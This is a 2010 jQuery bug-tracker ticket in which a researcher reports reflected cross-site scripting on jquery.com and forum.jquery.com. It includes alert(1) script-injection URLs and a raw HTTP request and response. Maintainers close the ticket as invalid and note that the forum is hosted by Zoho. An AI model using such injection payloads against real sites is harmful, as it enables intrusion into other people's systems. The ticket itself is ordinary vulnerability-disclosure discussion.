Skip to main content

Bug Tracker

Side navigation

#7509 closed bug (invalid)

Opened November 14, 2010 05:21PM UTC

Closed December 01, 2010 11:34PM UTC

Last modified March 13, 2012 05:25PM UTC

Report of XSS in jquery.com

Reported by: h02332@gmail.com Owned by: jdsharp
Priority: undecided Milestone: 1.5
Component: web Version: 1.4.4
Keywords: Cc:
Blocked by: Blocking:
Description

Report of XSS in forum.query.com and jquery.com, etc.

We tried to make a few private contacts but received no response. We've fingerprinted Cross Site Scripting and provide a Forum Poc:

http://forum.jquery.com/?d53cd"><script>alert(1)</script>f59c917a6e7=1

Also provided is a jquery.com PoC:

http://jquery.com/?d53cd"><script>alert(1)</script>f59c917a6e7=1

As noted, this can be reproduced en mass.

We'd appreciate someone from the jquery team sending us email to h02332 \\\\@\\\\/ gmail \\\\.//\\ com as we have a number of bugs to provide privately.

Thank You.

Hoyt LLC Research

Attachments (0)
Change History (12)

Changed November 14, 2010 07:49PM UTC by addyosmani comment:1

component: unfiledweb
owner: → jdsharp

Changed November 14, 2010 11:32PM UTC by dmethvin comment:2

#7510 is a duplicate of this ticket.

Changed November 14, 2010 11:33PM UTC by dmethvin comment:3

#7511 is a duplicate of this ticket.

Changed November 14, 2010 11:33PM UTC by dmethvin comment:4

#7512 is a duplicate of this ticket.

Changed November 14, 2010 11:33PM UTC by dmethvin comment:5

#7513 is a duplicate of this ticket.

Changed November 14, 2010 11:33PM UTC by dmethvin comment:6

#7514 is a duplicate of this ticket.

Changed November 14, 2010 11:33PM UTC by dmethvin comment:7

#7515 is a duplicate of this ticket.

Changed November 14, 2010 11:34PM UTC by dmethvin comment:8

#7516 is a duplicate of this ticket.

Changed November 15, 2010 12:29AM UTC by SlexAxton comment:9

status: newassigned

Changed December 01, 2010 11:34PM UTC by snover comment:10

resolution: → invalid
status: assignedclosed

None of these reports are valid. Just because IE says it’s “changed the page” to prevent XSS doesn’t mean there is actually a vulnerability on the page, and in these cases, there was indeed no vulnerability.

Changed December 02, 2010 03:03AM UTC by anonymous comment:11

Hello-

This is the first update we've seen on this ticket.. we don't publish live PoC's for frameworks.. however, some additional info can help..

Request

GET /?d53cd"><script>alert(1)</script>f59c917a6e7=1 HTTP/1.1

Host: forum.jquery.com

Response

HTTP/1.1 200 OK

Set-Cookie: zdccn=ba2a8341-6714-4548-ba38-cb44b081796e; Path=/

<head>

<link rel="SH

...[SNIP]...

<a href="/portalLogin.do?serviceurl=/?d53cd"><script>alert(1)</script>f59c917a6e7=1&forumGroupUrl=jquery">

...[SNIP]...

This is JqueryUI ... cookies too.. http://cloudscan.blogspot.com/2010/11/jqueryuicom-cross-site-scripting.html

From the looks of this ticket, it doesn't look like more info is requested, so we'll publish the data. Sorry you didn't find the info useful.

Changed December 03, 2010 03:18AM UTC by snover comment:12

forum.jquery.com is not our property. We have no control over the code. You should talk to Zoho about that.